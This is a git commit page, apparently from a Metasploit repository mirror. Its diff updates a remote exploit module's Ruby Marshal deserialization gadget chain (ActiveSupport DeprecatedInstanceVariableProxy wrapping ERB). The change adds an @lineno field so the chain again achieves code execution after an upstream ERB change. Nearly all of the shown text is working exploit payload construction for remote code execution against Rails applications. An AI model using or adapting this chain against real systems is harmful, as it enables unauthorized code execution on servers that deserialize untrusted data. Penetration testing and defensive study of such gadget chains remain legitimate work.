fix popchain
ERB changed as per <https://github.com/ruby/ruby/commit/e82f4195d4> which broke the popchain used for code execution.bug/bundler_fix
parent
4495b27e67
commit
17bad7bd4f
|
@ -200,8 +200,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
return "\x04\b" +
|
return "\x04\b" +
|
||||||
"o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
|
"o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
|
||||||
":\x0E@instanceo" +
|
":\x0E@instanceo" +
|
||||||
":\bERB\x06" +
|
":\bERB\x07" +
|
||||||
":\t@src"+ Marshal.dump(code)[2..-1] +
|
":\t@src"+ Marshal.dump(code)[2..-1] +
|
||||||
|
":\x0c@lineno"+ "i\x00" +
|
||||||
":\f@method:\vresult:" +
|
":\f@method:\vresult:" +
|
||||||
"\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
|
"\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
|
||||||
end
|
end
|
||||||
|
@ -209,9 +210,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
return Rex::Text.encode_base64 "\x04\x08" +
|
return Rex::Text.encode_base64 "\x04\x08" +
|
||||||
"o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
|
"o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
|
||||||
":\x0E@instance" +
|
":\x0E@instance" +
|
||||||
"o"+":\x08ERB"+"\x06" +
|
"o"+":\x08ERB"+"\x07" +
|
||||||
":\x09@src" +
|
":\x09@src" +
|
||||||
Marshal.dump(code)[2..-1] +
|
Marshal.dump(code)[2..-1] +
|
||||||
|
":\x0c@lineno"+ "i\x00" +
|
||||||
":\x0C@method"+":\x0Bresult"
|
":\x0C@method"+":\x0Bresult"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue